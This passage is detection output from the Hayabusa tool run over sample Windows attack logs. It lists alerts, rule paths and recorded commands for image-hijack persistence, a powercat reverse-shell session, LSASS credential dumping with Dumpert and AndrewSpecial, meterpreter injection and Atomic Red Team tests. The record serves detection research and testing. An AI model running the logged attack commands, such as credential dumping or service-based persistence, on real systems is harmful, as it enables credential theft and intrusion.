Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service 